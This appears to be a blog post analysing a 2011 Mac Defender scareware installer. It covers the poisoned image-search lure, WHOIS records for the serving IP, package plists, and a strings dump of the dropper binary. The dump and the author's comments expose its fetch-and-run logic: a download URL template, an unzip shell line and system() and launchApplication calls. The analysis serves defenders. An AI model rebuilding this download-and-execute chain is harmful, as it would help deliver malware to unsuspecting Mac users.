About | ACP | Buy | Forum | Industry Watch | Learning Curve | Search | Twitter | Xnews
Home » Learning Curve

Inside Mac Defender

The new version. Part one.


Buy It

Try It

Nobody wants you to see it.

They give you big eye candy pictures of it in action but they don't want to tell you what's inside or how it actually works.

We were surfing at Google images and looking - unbelievably enough - for silly pictures of swimming goggles. We tried searching for 'swimming goggles clipart' as that suggestion came up.

And we opted for 'large' images. We saw a pic that didn't fit in, found it intriguing, and clicked.

Here's the picture.



But with JavaScript on, the usual thing happens. [Clue #1: don't use JavaScript at Google images until they get control of the situation, if ever. More below.]

So yes, we got a JavaScript alert panel like everyone else. And with the sender IP in the header. [Clue #2: benign services don't put an IP in the header. And if it had been Google (which of course it was not) then it would have looked a lot different.]

The Safari browser window turned into some sort of Finder display. We don't use Finder (and haven't in years) but still and all: you don't get Finder in a browser and only an eejit would not raise an eyebrow.

[Clue #3: don't get scared. That's what they want. You start thinking stupid when you're scared and this ruse is really really stupid.]



The site this ruse came from is akmalsiddiqui.com. Here's what their home page looks like at the present. But of course there are hundreds, possibly thousands, of such sites today. And word has it they're all run by thoroughbred idiots who get their FTP hacked and don't notice anything wrong for days or weeks on end. Beware.



It doesn't really matter much who owns akmalsiddiqui.com. But someone might send them a wake-up call (as they seem to need one). As can be seen, they've performed a rudimentary install of Drupal (with the default Drupal icon) and then just left it at that for now. Good show.

The domain is registered by enom.com and protected by their 'Whois Privacy Protection Service'. The two DNS servers are ns1.ipage.com and ns2.ipage.com. It's found at IP 66.96.147.112 and is in a block belonging to The Endurance International Group of Burlington Maryland - and it uses the same terrestrial address as ipage.com. But this is not the IP the alert panel supposedly emanated from.

That IP was 178.63.32.107 and its data is as follows.

Name:
    static.107.32.63.178.clients.your-server.de

Aliases:
    107.32.63.178.in-addr.arpa

Addresses:
    178.63.32.107

Address Type:
    AF_INET

178.63.32.107 comes from a block owned by Hetzner Online AG. You can see their contact address in the middle. So if you get hit by one of these Mac Defender attacks, locate the IP range and get the contact address and tell them who the eejits are who have an infected site. Just like we did.

inetnum:        178.63.32.96 - 178.63.32.111
netname:        HETZNER-RZ11
descr:          Hetzner Online AG
descr:          Datacenter 11
country:        DE
admin-c:        HOAC1-RIPE
tech-c:         HOAC1-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
mnt-lower:      HOS-GUN
mnt-routes:     HOS-GUN
source:         RIPE # Filtered

role:           Hetzner Online AG - Contact Role
address:        Hetzner Online AG
address:        Stuttgarter Straße 1
address:        D-91710 Gunzenhausen
address:        Germany
phone:          +49 9831 61 00 61
fax-no:         +49 9831 61 00 62
abuse-mailbox:  abuse@hetzner.de
remarks:        *************************************************
remarks:        * For spam/abuse/security issues please contact *
remarks:        *    abuse@hetzner.de ,  not  this  address     *
remarks:        *************************************************
remarks:
remarks:        *************************************************
remarks:        *    Any questions on Peering please send to    *
remarks:        *              peering@hetzner.de               *
remarks:        *************************************************
org:            ORG-HOA1-RIPE
admin-c:        MH375-RIPE
tech-c:         GM834-RIPE
tech-c:         RB1502-RIPE
tech-c:         SK2374-RIPE
tech-c:         ND762-RIPE
tech-c:         TF2013-RIPE
tech-c:         MF1400-RIPE
nic-hdl:        HOAC1-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

% Information related to '178.63.0.0/16AS24940'

route:          178.63.0.0/16
descr:          HETZNER-RZ-FKS-BLK2
origin:         AS24940
org:            ORG-HOA1-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

organisation:   ORG-HOA1-RIPE
org-name:       Hetzner Online AG
org-type:       LIR
address:        Hetzner Online AG
                Attn. Martin Hetzner
                Stuttgarter Str. 1
                91710 Gunzenhausen
                GERMANY
phone:          +49 9831 610061
fax-no:         +49 9831 610062
admin-c:        DM93-RIPE
admin-c:        GM834-RIPE
admin-c:        HOAC1-RIPE
admin-c:        MH375-RIPE
admin-c:        RB1502-RIPE
admin-c:        SK2374-RIPE
admin-c:        TF2013-RIPE
admin-c:        MF1400-RIPE
mnt-ref:        HOS-GUN
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
source:         RIPE # Filtered

Inside

The first payload (the first part) came in a ZIP file of 42453 bytes called 'anti-malware.zip'. Now things like this can't go any further if you don't have that setting on Safari that Apple UE engineers won't budge from - automatically open 'safe' downloads (whatever 'safe' is). Because you just don't have that on. Got it?

Anyway: this one (but maybe not the next one) is called 'mcshdr.pkg'. It's easy to look inside if you have better than Apple's daycare tools.

15 items, 109021 bytes, 296 blocks, 0 bytes in extended attributes.

mcshdr.pkg/Contents
mcshdr.pkg/Contents/Archive.bom
mcshdr.pkg/Contents/Archive.pax.gz
mcshdr.pkg/Contents/Info.plist
mcshdr.pkg/Contents/PkgInfo
mcshdr.pkg/Contents/Resources
mcshdr.pkg/Contents/Resources/Archive.sizes
mcshdr.pkg/Contents/Resources/Description.plist
mcshdr.pkg/Contents/Resources/mcshdr.bom
mcshdr.pkg/Contents/Resources/mcshdr.info
mcshdr.pkg/Contents/Resources/mcshdr.pax.gz
mcshdr.pkg/Contents/Resources/mcshdr.post_install
mcshdr.pkg/Contents/Resources/mcshdr.sizes
mcshdr.pkg/Contents/Resources/package_version
mcshdr.pkg/Contents/Resources/postinstall

[Note: if you do find a copy of Mac Defender and you want to play around with it, rename the top level PKG directory so you don't accidentally double-click it or something. Then you're relatively safe.]

Info.plist

This file reveals a lot.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>CFBundleDevelopmentRegion</key>
    <string>English</string>
    <key>CFBundleIdentifier</key>
    <string>net.abv</string>
    <key>CFBundleName</key>
    <string>Install program</string>
    <key>CFBundleShortVersionString</key>
    <string>2.4</string>
    <key>IFMajorVersion</key>
    <integer>2</integer>
    <key>IFMinorVersion</key>
    <integer>2</integer>
    <key>IFPkgBuildDate</key>
    <date>2011-06-10T11:54:01Z</date>
    <key>IFPkgBuildVersion</key>
    <string>10J869</string>
    <key>IFPkgCreator</key>
    <string>PkgCreator</string>
    <key>IFPkgFlagAllowBackRev</key>
    <false/>
    <key>IFPkgFlagAuthorizationAction</key>
    <string>NoAuthorization</string>
    <key>IFPkgFlagDefaultLocation</key>
    <string>/Applications</string>
    <key>IFPkgFlagFollowLinks</key>
    <false/>
    <key>IFPkgFlagInstalledSize</key>
    <integer>96</integer>
    <key>IFPkgFlagIsRequired</key>
    <false/>
    <key>IFPkgFlagOverwritePermissions</key>
    <false/>
    <key>IFPkgFlagRelocatable</key>
    <false/>
    <key>IFPkgFlagRestartAction</key>
    <string>NoRestart</string>
    <key>IFPkgFlagRootVolumeOnly</key>
    <false/>
    <key>IFPkgFlagUpdateInstalledLanguages</key>
    <false/>
    <key>IFPkgFormatVersion</key>
    <real>0.10000000149011611</real>
</dict>
</plist>

Mac Defender is supposedly up to version 2.2 and was released only today (if that means anything - and of course the AV companies would tell you it meant a lot).

<key>IFPkgBuildDate</key>
<date>2011-06-10T11:54:01Z</date>

It's also apparent this is a new version as it doesn't require authorisation.

<key>IFPkgFlagAuthorizationAction</key>
<string>NoAuthorization</string>

It also wants to install in /Applications and doesn't want you putting it anywhere else. (Why becomes clear later.)

<key>IFPkgFlagDefaultLocation</key>
<string>/Applications</string>

<key>IFPkgFlagRelocatable</key>
<false/>

It doesn't require a restart.

<key>IFPkgFlagRestartAction</key>
<string>NoRestart</string>

And so forth. The important thing here is it doesn't need an admin passwod to proceed. Whether it needs root access is another matter - there's namely a way to hijack a sneaky hack Apple introduced recently.

Archive.pax.gz

This one's easy enough to open up. There's something called 'mcshdr.app' inside.

mcshdr.app

mcshdr.app's Info.plist looks like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>BuildMachineOSBuild</key>
    <string>10J869</string>
    <key>CFBundleDevelopmentRegion</key>
    <string>English</string>
    <key>CFBundleExecutable</key>
    <string>mcshdr</string>
    <key>CFBundleIdentifier</key>
    <string>net.mcghg</string>
    <key>CFBundleInfoDictionaryVersion</key>
    <string>7.0</string>
    <key>CFBundleName</key>
    <string>mcshdr</string>
    <key>CFBundlePackageType</key>
    <string>APPL</string>
    <key>CFBundleShortVersionString</key>
    <string>1.0</string>
    <key>CFBundleSignature</key>
    <string>????</string>
    <key>CFBundleVersion</key>
    <string>1</string>
    <key>DTCompiler</key>
    <string>com.apple.compilers.llvm.clang.1_0</string>
    <key>DTPlatformBuild</key>
    <string>10M2518</string>
    <key>DTPlatformVersion</key>
    <string>PG</string>
    <key>DTSDKBuild</key>
    <string>9L31a</string>
    <key>DTSDKName</key>
    <string>macosx10.5</string>
    <key>DTXcode</key>
    <string>0400</string>
    <key>DTXcodeBuild</key>
    <string>10M2518</string>
    <key>LSMinimumSystemVersion</key>
    <string>10.5</string>
    <key>NSMainNibFile</key>
    <string>MainMenu</string>
    <key>NSPrincipalClass</key>
    <string>NSApplication</string>
</dict>
</plist>

The executable is small - 43796 bytes. It's only for Intel boxen.

file *
mcshdr: Mach-O universal binary with 2 architectures
mcshdr (for architecture x86_64):	Mach-O 64-bit executable x86_64
mcshdr (for architecture i386):	Mach-O executable i386

There's a less than great 48x48 PNG image inside: DownloadPict.png.



MainMenu.nib, located in English.lproj, is a new type of NIB. Contrary to popular opinion, it is possible to open these NIBs sans the helper files. This is what you see for mcshdr.app's MainMenu.nib in Interface Builder.

You can test run the NIB too. And then you'll see this. (The download image goes on the left at runtime.)

Not really top drawer. [Apple would do better and this is posing as an Apple product. Sorry.]

InfoPlist.strings, Localizable.strings

InfoPlist.strings is an empty template file and it's only there because the hackers aren't that versed on the platform and/or are a little sloppy and/or just don't give a damn.

Localizable.strings has only the following. It goes into the window when the app runs. Again: it's not too 'professional'.

"WndTitle" = "Software download";
"ProgressStr" = "%d%% loaded ...";

mcshdr.xstrings

It's here we begin to see what the bastard's up to. This was of course extracted with Xstrings. A lot of this looks like pure gibberish but it's not.

0000000000001028 __PAGEZERO
0000000000001070 __TEXT
00000000000010b0 __text
00000000000010c0 __TEXT
0000000000001100 __symbol_stub1
0000000000001110 __TEXT
0000000000001150 __cstring
0000000000001160 __TEXT
00000000000011a0 __const
00000000000011b0 __TEXT
00000000000011f0 __stub_helper
0000000000001200 __TEXT
0000000000001240 __unwind_info
0000000000001250 __TEXT
0000000000001290 __eh_frame
00000000000012a0 __TEXT
00000000000012e8 __DATA
0000000000001328 __dyld
0000000000001338 __DATA
0000000000001378 __nl_symbol_ptr
0000000000001388 __DATA
00000000000013c8 __la_symbol_ptr
00000000000013d8 __DATA
0000000000001418 __cfstring
0000000000001428 __DATA
0000000000001468 __objc_data
0000000000001478 __DATA
00000000000014b8 __objc_msgrefs
00000000000014c8 __DATA
0000000000001508 __objc_selrefs
0000000000001518 __DATA
0000000000001558 __objc_classrefs__DATA
00000000000015a8 __objc_const
00000000000015b8 __DATA
00000000000015f8 __objc_classlist__DATA
0000000000001648 __objc_imageinfo__DATA
0000000000001698 __data
00000000000016a8 __DATA
00000000000016e8 __bss
00000000000016f8 __DATA
0000000000001740 __LINKEDIT
0000000000001824 /usr/lib/dyld
0000000000001920 /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
0000000000001978 /usr/lib/libstdc++.6.dylib
00000000000019b0 /usr/lib/libgcc_s.1.dylib
00000000000019e8 /usr/lib/libSystem.B.dylib
0000000000001a20 /usr/lib/libobjc.A.dylib
0000000000001a58 /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0000000000001ac0 /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0000000000001b30 /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0000000000001b90 /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
0000000000001d74 AVSH
0000000000001daf 0[A^]
0000000000001e10 [A^]
0000000000001ebd [A^]
0000000000001ed2 AWAVAUATSH
000000000000208b [A\A]A^A_]
00000000000020b9 AWAVSH
0000000000002180 [A^A_]
00000000000021d5 [A^A_]A
00000000000021e2 AWAVATS1
00000000000022ab [A\A^A_]
000000000000230e AVSH
00000000000023fe [A^]
000000000000240b AWAVATSH
00000000000024e0 [A\A^A_]
0000000000002540 InstallerAppDelegate
0000000000002555 applicationDidFinishLaunching:
0000000000002574 @16@0:8
000000000000257c setWindow:
0000000000002587 @"NSWindow"
0000000000002593 T@"NSWindow",Vwindow
00000000000025a8 OnWndAppearing
00000000000025b7 cStringUsingEncoding:
00000000000025cd stringWithCString:encoding:
00000000000025e9 mainBundle
00000000000025f4 pathForResource:ofType:
000000000000260c componentsSeparatedByString:
0000000000002629 objectAtIndex:
0000000000002638 stringWithFormat:
000000000000264a window
0000000000002651 alphaValue
000000000000265c setAlphaValue:
000000000000266b invalidate
0000000000002676 startDownloadingURL:
000000000000268b URLWithString:
000000000000269a requestWithURL:cachePolicy:timeoutInterval:
00000000000026c6 alloc
00000000000026cc initWithRequest:delegate:
00000000000026e6 setDestination:allowOverwrite:
0000000000002705 bundlePath
0000000000002710 defaultManager
000000000000271f removeItemAtPath:error:
0000000000002737 terminate:
0000000000002742 release
000000000000274a setIntValue:
0000000000002757 sharedWorkspace
0000000000002767 launchApplication:
000000000000277a retain
0000000000002781 setDownloadResponse:
0000000000002796 expectedContentLength
00000000000027ac localizedStringForKey:value:table:
00000000000027cf setStringValue:
00000000000027df setLevel:
00000000000027e9 orderFront:
00000000000027f5 center
00000000000027fc scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:
000000000000283e ProgressStr
000000000000284d Cannot open file
0000000000002860 getConfigParam
000000000000286f /Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm
00000000000028b5 nParam > -1 && nParam < 4
00000000000028d3 DownloadPict
00000000000028e2 http://%@/mac/soft.php?affid=%@
0000000000002902 app.zip
000000000000290a /Applications/%@.%@
0000000000002922 cd /Applications;unzip %@;rm -rf __MACOSX
000000000000294c m_TextProgress
000000000000295b @"NSTextField"
000000000000296a m_Progress
0000000000002975 @"NSLevelIndicator"
0000000000002989 m_timerAppear
0000000000002997 @"NSTimer"
00000000000029a2 m_downloadResponse
00000000000029b5 @"NSURLResponse"
00000000000029c6 m_bytesReceived
00000000000029d8 awakeFromNib
00000000000029e5 v16@0:8
00000000000029ed download:shouldDecodeSourceDataOfMIMEType:
0000000000002a18 c32@0:8@16@24
0000000000002a26 download:didReceiveDataOfLength:
0000000000002a47 v28@0:8@16I24
0000000000002a55 download:didReceiveResponse:
0000000000002a72 v32@0:8@16@24
0000000000002a80 v24@0:8@16
0000000000002a8b downloadDidFinish:
0000000000002a9e download:didFailWithError:
0000000000002ab9 v20@0:8c16
0000000000002ac4 DownloadWinCtrl
0000000000004001 @__ZdaPv
000000000000400e @__Znam
0000000000004018 @dyld_stub_binder
000000000000402e @__objc_empty_cache
0000000000004049 @__objc_empty_vtable
0000000000004065 @_objc_msgSend_fixup
0000000000004081 @_OBJC_CLASS_$_NSObject
000000000000409d @_OBJC_CLASS_$_NSTimer
00000000000040b8 @_OBJC_METACLASS_$_NSObject
00000000000040da @___CFConstantStringClassReference
0000000000004105 @_OBJC_CLASS_$_NSBundle
0000000000004121 @_OBJC_CLASS_$_NSFileManager
0000000000004141 @_OBJC_CLASS_$_NSString
000000000000415d @_OBJC_CLASS_$_NSURL
0000000000004175 @_OBJC_CLASS_$_NSURLDownload
0000000000004193 @_OBJC_CLASS_$_NSURLRequest
00000000000041b4 @_NSApp
00000000000041bf @_OBJC_CLASS_$_NSWindowController
00000000000041e5 @_OBJC_CLASS_$_NSWorkspace
0000000000004204 @_OBJC_METACLASS_$_NSWindowController
0000000000004230 @__ZdaPv
000000000000423d @__Znam
000000000000424b @_CGWindowLevelForKey
0000000000004266 @_NSApplicationMain
000000000000427f @_NSLog
000000000000428c @___assert_rtn
00000000000042a1 @_exit
00000000000042ae @_fclose
00000000000042bd @_fopen
00000000000042cb @_fread
00000000000042d9 @_fseek
00000000000042e7 @_memset
00000000000042f6 @_strlen
0000000000004305 @_system
0000000000004315 start
0000000000004320 !environ
0000000000004329 ONXArg
0000000000004333 mh_execute_header
0000000000004345 A_progname
0000000000004a42 dyld_stub_binding_helper
0000000000004a5b _main
0000000000004a61 -[InstallerAppDelegate applicationDidFinishLaunching:]
0000000000004a98 -[InstallerAppDelegate window]
0000000000004ab7 -[InstallerAppDelegate setWindow:]
0000000000004ada -[DownloadWinCtrl OnWndAppearing]
0000000000004afc -[DownloadWinCtrl setDownloadResponse:]
0000000000004b24 -[DownloadWinCtrl download:didReceiveResponse:]
0000000000004b54 -[DownloadWinCtrl download:didReceiveDataOfLength:]
0000000000004b88 -[DownloadWinCtrl download:shouldDecodeSourceDataOfMIMEType:]
0000000000004bc6 __ZL14getConfigParami
0000000000004bdc -[DownloadWinCtrl startDownloadingURL:]
0000000000004c04 __ZL13deleteAndExitv
0000000000004c19 -[DownloadWinCtrl download:didFailWithError:]
0000000000004c47 -[DownloadWinCtrl downloadDidFinish:]
0000000000004c6d -[DownloadWinCtrl awakeFromNib]
0000000000004c8d __ZZL14getConfigParamiE8__func__
0000000000004cae  stub helpers
0000000000004cbc _OBJC_METACLASS_$_InstallerAppDelegate
0000000000004ce3 _OBJC_CLASS_$_InstallerAppDelegate
0000000000004d06 _OBJC_METACLASS_$_DownloadWinCtrl
0000000000004d28 _OBJC_CLASS_$_DownloadWinCtrl
0000000000004d46 _OBJC_IVAR_$_InstallerAppDelegate.window
0000000000004d6f _OBJC_IVAR_$_DownloadWinCtrl.m_timerAppear
0000000000004d9a _OBJC_IVAR_$_DownloadWinCtrl.m_downloadResponse
0000000000004dca _OBJC_IVAR_$_DownloadWinCtrl.m_bytesReceived
0000000000004df7 _OBJC_IVAR_$_DownloadWinCtrl.m_Progress
0000000000004e1f _OBJC_IVAR_$_DownloadWinCtrl.m_TextProgress
0000000000004e4b __ZZ45-[DownloadWinCtrl download:didFailWithError:]E12s_nFailedCnt
0000000000004e8e _NXArgc
0000000000004e96 _NXArgv
0000000000004e9e ___progname
0000000000004eaa __mh_execute_header
0000000000004ebe _environ
0000000000004ec7 start
0000000000004ecd _CGWindowLevelForKey
0000000000004ee2 _NSApp
0000000000004ee9 _NSApplicationMain
0000000000004efc _NSLog
0000000000004f03 _OBJC_CLASS_$_NSBundle
0000000000004f1a _OBJC_CLASS_$_NSFileManager
0000000000004f36 _OBJC_CLASS_$_NSObject
0000000000004f4d _OBJC_CLASS_$_NSString
0000000000004f64 _OBJC_CLASS_$_NSTimer
0000000000004f7a _OBJC_CLASS_$_NSURL
0000000000004f8e _OBJC_CLASS_$_NSURLDownload
0000000000004faa _OBJC_CLASS_$_NSURLRequest
0000000000004fc5 _OBJC_CLASS_$_NSWindowController
0000000000004fe6 _OBJC_CLASS_$_NSWorkspace
0000000000005000 _OBJC_METACLASS_$_NSObject
000000000000501b _OBJC_METACLASS_$_NSWindowController
0000000000005040 __ZdaPv
0000000000005048 __Znam
000000000000504f ___CFConstantStringClassReference
0000000000005071 ___assert_rtn
000000000000507f __objc_empty_cache
0000000000005092 __objc_empty_vtable
00000000000050a6 _exit
00000000000050ac _fclose
00000000000050b4 _fopen
00000000000050bb _fread
00000000000050c2 _fseek
00000000000050c9 _memset
00000000000050d1 _objc_msgSend_fixup
00000000000050e5 _strlen
00000000000050ed _system
00000000000050f5 dyld_stub_binder
0000000000006024 __PAGEZERO
000000000000605c __TEXT
000000000000608c __text
000000000000609c __TEXT
00000000000060d0 __cstring
00000000000060e0 __TEXT
0000000000006114 __const
0000000000006124 __TEXT
0000000000006158 __symbol_stub
0000000000006168 __TEXT
000000000000619c __stub_helper
00000000000061ac __TEXT
00000000000061e0 __unwind_info
00000000000061f0 __TEXT
0000000000006224 __eh_frame
0000000000006234 __TEXT
0000000000006270 __DATA
00000000000062a0 __dyld
00000000000062b0 __DATA
00000000000062e4 __nl_symbol_ptr
00000000000062f4 __DATA
0000000000006328 __la_symbol_ptr
0000000000006338 __DATA
000000000000636c __cfstring
000000000000637c __DATA
00000000000063b0 __data
00000000000063c0 __DATA
00000000000063f4 __bss
0000000000006404 __DATA
0000000000006440 __OBJC
0000000000006470 __module_info
0000000000006480 __OBJC
00000000000064b4 __meta_class
00000000000064c4 __OBJC
00000000000064f8 __instance_vars
0000000000006508 __OBJC
000000000000653c __inst_meth
000000000000654c __OBJC
0000000000006580 __property
0000000000006590 __OBJC
00000000000065c4 __class_ext
00000000000065d4 __OBJC
0000000000006608 __class
0000000000006618 __OBJC
000000000000664c __symbols
000000000000665c __OBJC
0000000000006690 __message_refs
00000000000066a0 __OBJC
00000000000066d4 __cls_refs
00000000000066e4 __OBJC
0000000000006718 __image_info
0000000000006728 __OBJC
0000000000006764 __LINKEDIT
0000000000006838 /usr/lib/dyld
0000000000006857 ;PB;+y
00000000000068c8 /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
000000000000691c /usr/lib/libstdc++.6.dylib
0000000000006950 /usr/lib/libgcc_s.1.dylib
0000000000006984 /usr/lib/libSystem.B.dylib
00000000000069b8 /usr/lib/libobjc.A.dylib
00000000000069ec /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0000000000006a54 /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0000000000006ac4 /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0000000000006b24 /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
0000000000006ce7 ^_[]
0000000000006e1e ,^_[]
0000000000006ee4  ^_]
000000000000709a 1ZAHu
00000000000070fb ,^_[]
0000000000007270 ^_[]
000000000000737a ^_[]
000000000000750e ^_[]
0000000000007626 ,^_[]
000000000000762c applicationDidFinishLaunching:
000000000000764b window
0000000000007652 @8@0:4
0000000000007659 setWindow:
0000000000007664 InstallerAppDelegate
0000000000007679 @"NSWindow"
0000000000007685 T@"NSWindow",Vwindow
000000000000769c scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:
00000000000076dd OnWndAppearing
00000000000076ec center
00000000000076f3 orderFront:
00000000000076ff setLevel:
0000000000007709 setStringValue:
0000000000007719 localizedStringForKey:value:table:
000000000000773c expectedContentLength
0000000000007752 setDownloadResponse:
0000000000007767 retain
000000000000776e launchApplication:
0000000000007781 sharedWorkspace
0000000000007791 setIntValue:
000000000000779e release
00000000000077a6 terminate:
00000000000077b1 removeItemAtPath:error:
00000000000077c9 defaultManager
00000000000077d8 bundlePath
00000000000077e3 setDestination:allowOverwrite:
0000000000007802 initWithRequest:delegate:
000000000000781c alloc
0000000000007822 requestWithURL:cachePolicy:timeoutInterval:
000000000000784e URLWithString:
000000000000785d startDownloadingURL:
0000000000007872 invalidate
000000000000787d setAlphaValue:
000000000000788c alphaValue
000000000000789a stringWithFormat:
00000000000078ac objectAtIndex:
00000000000078bb componentsSeparatedByString:
00000000000078d8 pathForResource:ofType:
00000000000078f0 mainBundle
00000000000078fb stringWithCString:encoding:
0000000000007917 cStringUsingEncoding:
000000000000792d NSString
0000000000007936 NSBundle
000000000000793f NSURLRequest
000000000000794c NSURL
0000000000007952 NSURLDownload
0000000000007960 NSFileManager
000000000000796e NSWorkspace
000000000000797a NSTimer
0000000000007983 ProgressStr
0000000000007992 Cannot open file
00000000000079a4 getConfigParam
00000000000079b3 /Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm
00000000000079f9 nParam > -1 && nParam < 4
0000000000007a17 DownloadPict
0000000000007a26 http://%@/mac/soft.php?affid=%@
0000000000007a46 app.zip
0000000000007a4e /Applications/%@.%@
0000000000007a66 cd /Applications;unzip %@;rm -rf __MACOSX
0000000000007a90 NSObject
0000000000007a99 NSWindowController
0000000000007aac DownloadWinCtrl
0000000000007abc m_TextProgress
0000000000007acb @"NSTextField"
0000000000007ada m_Progress
0000000000007ae5 @"NSLevelIndicator"
0000000000007af9 m_timerAppear
0000000000007b07 @"NSTimer"
0000000000007b12 m_downloadResponse
0000000000007b25 @"NSURLResponse"
0000000000007b36 m_bytesReceived
0000000000007b48 awakeFromNib
0000000000007b55 v8@0:4
0000000000007b5c download:shouldDecodeSourceDataOfMIMEType:
0000000000007b87 c16@0:4@8@12
0000000000007b94 download:didReceiveDataOfLength:
0000000000007bb5 v16@0:4@8I12
0000000000007bc2 download:didReceiveResponse:
0000000000007bdf v16@0:4@8@12
0000000000007bec v12@0:4@8
0000000000007bf6 downloadDidFinish:
0000000000007c09 download:didFailWithError:
0000000000007c24 v12@0:4c8
000000000000a001 @__ZdaPv
000000000000a00e @__Znam
000000000000a018 @dyld_stub_binder
000000000000a02e @___CFConstantStringClassReference
000000000000a058 @_NSApp
000000000000a064 @__ZdaPv
000000000000a071 @__Znam
000000000000a07f @_CGWindowLevelForKey
000000000000a09a @_NSApplicationMain
000000000000a0b3 @_NSLog
000000000000a0c0 @___assert_rtn
000000000000a0d4 @_exit
000000000000a0e0 @_fclose
000000000000a0ee @_fopen
000000000000a0fb @_fread
000000000000a108 @_fseek
000000000000a115 @_memset
000000000000a123 @_objc_msgSend
000000000000a137 @_objc_msgSend_fpret
000000000000a151 @_strlen
000000000000a15f @_system$UNIX2003
000000000000a179 start
000000000000a17f X.objc_class_name_
000000000000a197 4environ
000000000000a1a0 bNXArg
000000000000a1aa mh_execute_header
000000000000a1bc T_progname
000000000000a1ef InstallerAppDelegate
000000000000a206 DownloadWinCtrl
000000000000a5b6 dyld_stub_binding_helper
000000000000a5cf _main
000000000000a5d5 -[InstallerAppDelegate applicationDidFinishLaunching:]
000000000000a60c -[InstallerAppDelegate window]
000000000000a62b -[InstallerAppDelegate setWindow:]
000000000000a64e -[DownloadWinCtrl download:shouldDecodeSourceDataOfMIMEType:]
000000000000a68c -[DownloadWinCtrl setDownloadResponse:]
000000000000a6b4 -[DownloadWinCtrl download:didReceiveResponse:]
000000000000a6e4 -[DownloadWinCtrl download:didReceiveDataOfLength:]
000000000000a718 -[DownloadWinCtrl OnWndAppearing]
000000000000a73a __ZL14getConfigParami
000000000000a750 -[DownloadWinCtrl startDownloadingURL:]
000000000000a778 __ZL13deleteAndExitv
000000000000a78d -[DownloadWinCtrl download:didFailWithError:]
000000000000a7bb -[DownloadWinCtrl downloadDidFinish:]
000000000000a7e1 -[DownloadWinCtrl awakeFromNib]
000000000000a801 __ZZL14getConfigParamiE8__func__
000000000000a822  stub helpers
000000000000a830 dyld__mach_header
000000000000a842 __ZZ45-[DownloadWinCtrl download:didFailWithError:]E12s_nFailedCnt
000000000000a885 .objc_class_name_DownloadWinCtrl
000000000000a8a6 .objc_class_name_InstallerAppDelegate
000000000000a8cc _NXArgc
000000000000a8d4 _NXArgv
000000000000a8dc ___progname
000000000000a8e8 __mh_execute_header
000000000000a8fc _environ
000000000000a905 start
000000000000a90b .objc_class_name_NSBundle
000000000000a925 .objc_class_name_NSFileManager
000000000000a944 .objc_class_name_NSObject
000000000000a95e .objc_class_name_NSString
000000000000a978 .objc_class_name_NSTimer
000000000000a991 .objc_class_name_NSURL
000000000000a9a8 .objc_class_name_NSURLDownload
000000000000a9c7 .objc_class_name_NSURLRequest
000000000000a9e5 .objc_class_name_NSWindowController
000000000000aa09 .objc_class_name_NSWorkspace
000000000000aa26 _CGWindowLevelForKey
000000000000aa3b _NSApp
000000000000aa42 _NSApplicationMain
000000000000aa55 _NSLog
000000000000aa5c __ZdaPv
000000000000aa64 __Znam
000000000000aa6b ___CFConstantStringClassReference
000000000000aa8d ___assert_rtn
000000000000aa9b _exit
000000000000aaa1 _fclose
000000000000aaa9 _fopen
000000000000aab0 _fread
000000000000aab7 _fseek
000000000000aabe _memset
000000000000aac6 _objc_msgSend
000000000000aad4 _objc_msgSend_fpret
000000000000aae8 _strlen
000000000000aaf0 _system$UNIX2003
000000000000ab01 dyld_stub_binder

Here's some of the good stuff.

0000000000001a58 /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0000000000001ac0 /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0000000000001b30 /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0000000000001b90 /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

He's using standard libraries.

0000000000002676 startDownloadingURL:
000000000000268b URLWithString:
000000000000269a requestWithURL:cachePolicy:timeoutInterval:

We're going online. We're going to get more weapons of destruction.

000000000000271f removeItemAtPath:error:

He's probably going to try to remove himself.

0000000000002767 launchApplication:

He's launching the download.

00000000000027df setLevel:
00000000000027e9 orderFront:
00000000000027f5 center

He puts himself high in the Z-chain.

000000000000286f /Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm

Ah a bit of a blooper. This is not a release build. So it has the location of its source code files. So now you can also read the username of the hacker who created this.

00000000000028e2 http://%@/mac/soft.php?affid=%@

And here's the location it will look for online. Presumably they've hacked into a number of sites and set up platform-specific directories.

0000000000002902 app.zip

That'll be the very descriptive name of the actual file to download.

000000000000290a /Applications/%@.%@

That's where it's supposed to go.

0000000000002922 cd /Applications;unzip %@;rm -rf __MACOSX

That's how the download is unarchived.

All that's needed now is the actual site it will access.

Searching for that source code path at Google turns up two hits. Both on Twitter.



The second tweet is actually good advice. The Mac Defender authors are either... or... or...

Two Copies

The download actually has two identical copies of the same mcshdr.app. Obviously only one needs to run.

mcshdr.info

mcshdr.info tells us mostly what we already know. Most important again is it doesn't need authorisation and it doesn't want you to choose another location. (And why will be obvious in the next section.)

Title Setup program
Version 2.4
Description 
DefaultLocation /Applications
DeleteWarning 

### Package Flags

NeedsAuthorization NO
